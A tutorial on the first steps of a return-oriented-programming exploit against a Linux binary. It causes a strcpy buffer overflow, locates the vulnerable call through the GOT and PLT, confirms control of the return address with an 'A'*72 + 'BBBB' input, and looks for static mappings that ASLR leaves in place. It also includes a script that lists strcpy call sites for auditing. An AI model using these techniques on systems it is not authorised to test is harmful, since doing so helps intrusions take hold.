# ROP Finding the vulnerable function

* At this point you have been able to generate a crash on a Linux binary. We now need to find the vulnerable function before progressing.

```
# creating the crash
python3 -c 'print("A"*100)' > temp.txt
./binary temp.txt

Segmentation fault
```

* Use `ltrace` to see which library function is executing when the crash occurs (the line printed just before `SIGSEGV`).

```
ltrace ./binary temp.txt 2>&1 | grep SIGSEGV -B1
7120-strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...) = 0x2ffff108b
--snip--
```

* We can see that `strcpy` is the call that triggers the crash.
* Use `objdump` to find where in the code segment `strcpy()` is called.
* Look at the GOT of the program and grep for `strcpy()`; this gives the relocation slot address.
* Then use `objdump` on the `.plt` section specifically to see which stub jumps through that GOT slot.
* After obtaining the stub address, run `objdump` once more on the `.text` section and grep for the address shown in the PLT.

```
objdump -R ./binary | grep strcpy
0304b00a R_386_JUMP_SLOT    strcpy
objdump -j .plt -d binary | grep b00a
70482b7:  ff 25 0a b0 04 03 jmp  *0x0304b00a
objdump -j .text -d binary | grep 82b7 -B2 -A2
# you will see the vuln buffer size
# the address of strcpy@plt
# and a ret which is a good spot for a break to see
# if your payload was successfully copied into mem
```
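The GOT-to-PLT-to-`.text` walk above can be scripted so every call site of a risky import is listed in one pass when auditing a binary. This is an added example, not from these notes; it assumes GNU binutils `objdump` output in the format shown above, and the sample listings embedded in it are constructed to mirror the page's addresses rather than taken from a real dump.

```shell
#!/bin/sh
# Added example: script the GOT -> PLT -> .text walk from the notes so every
# call site of a risky import (strcpy here) is listed in one pass.
# Assumes GNU binutils objdump output in the format shown on the page.

# GOT relocation slot for a symbol, from `objdump -R` output on stdin.
got_slot() {
    awk -v sym="$1" '$2 ~ /JUMP_SLOT/ && $3 == sym { print $1; exit }'
}

# PLT stub that jumps through that slot, from `objdump -j .plt -d` on stdin.
# Leading zeros are stripped on both sides: the relocation table prints
# 0304b00a while the disassembly operand is printed as *0x304b00a.
plt_stub() {
    awk -v slot="$1" '
        BEGIN { sub(/^0+/, "", slot) }
        /jmp/ && match($0, /\*0x[0-9a-f]+/) {
            op = substr($0, RSTART + 3, RLENGTH - 3); sub(/^0+/, "", op)
            if (op == slot) { sub(/:$/, "", $1); print $1; exit }
        }'
}

# Every call into that stub, from `objdump -j .text -d` output on stdin.
call_sites() {
    awk -v stub="$1" '/call/ && index($0, stub) { sub(/:$/, "", $1); print $1 }'
}

# Whole walk against a real binary: locate_calls ./binary strcpy
locate_calls() {
    slot=$(objdump -R "$1" | got_slot "$2")
    [ -n "$slot" ] || { echo "$2 not imported via the GOT" >&2; return 1; }
    stub=$(objdump -j .plt -d "$1" | plt_stub "$slot")
    objdump -j .text -d "$1" | call_sites "$stub"
}

# Constructed sample listings shaped like the page's output (not real dumps).
SAMPLE_R='0304b006 R_386_JUMP_SLOT   puts
0304b00a R_386_JUMP_SLOT   strcpy'
SAMPLE_PLT=' 70482b0:  ff 25 06 b0 04 03  jmp  *0x304b006
 70482b7:  ff 25 0a b0 04 03  jmp  *0x304b00a'
SAMPLE_TEXT=' 7048510:  e8 a2 fd ff ff  call 70482b7 <strcpy@plt>
 7048520:  e8 8b fd ff ff  call 70482b0 <puts@plt>
 7048530:  e8 82 fd ff ff  call 70482b7 <strcpy@plt>'

slot=$(printf '%s\n' "$SAMPLE_R" | got_slot strcpy)      # 0304b00a
stub=$(printf '%s\n' "$SAMPLE_PLT" | plt_stub "$slot")   # 70482b7
printf '%s\n' "$SAMPLE_TEXT" | call_sites "$stub"         # 7048510 and 7048530
```

Each printed address is a `call strcpy@plt` site to inspect in the disassembly for the buffer size and the `ret` that follows it; `locate_calls` runs the same three functions against a real file.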

* To validate the finding, check that your buffer analysis was correct (the buffer here is 72 bytes): fill it exactly and append four `B`s; if the crash lands on `0x42424242`, the return address offset is confirmed.

```
python3 -c 'print("A"*72 + "BBBB")' > temp.txt
gdb ./binary
run temp.txt
Program received signal SIGSEGV, Segmentation fault
0x42424242 in ?? ()
```

### Find static addresses

* We need to find static memory locations because ASLR will be enabled on modern systems.
* There may be static regions that are not randomized by ASLR.
* There could be static mappings from third-party libraries that get mapped into our process.
* Use `ltrace` to find the static mappings:

```
ltrace ./binary temp.txt 2>&1 | egrep -i 'mmap|open'
```

* Look for any shared object that is mmap'd into the process.
* You should see an `open()` call followed by an `mmap()` with a non-NULL address passed in as the requested mapping address; that address is a fixed location you can rely on.
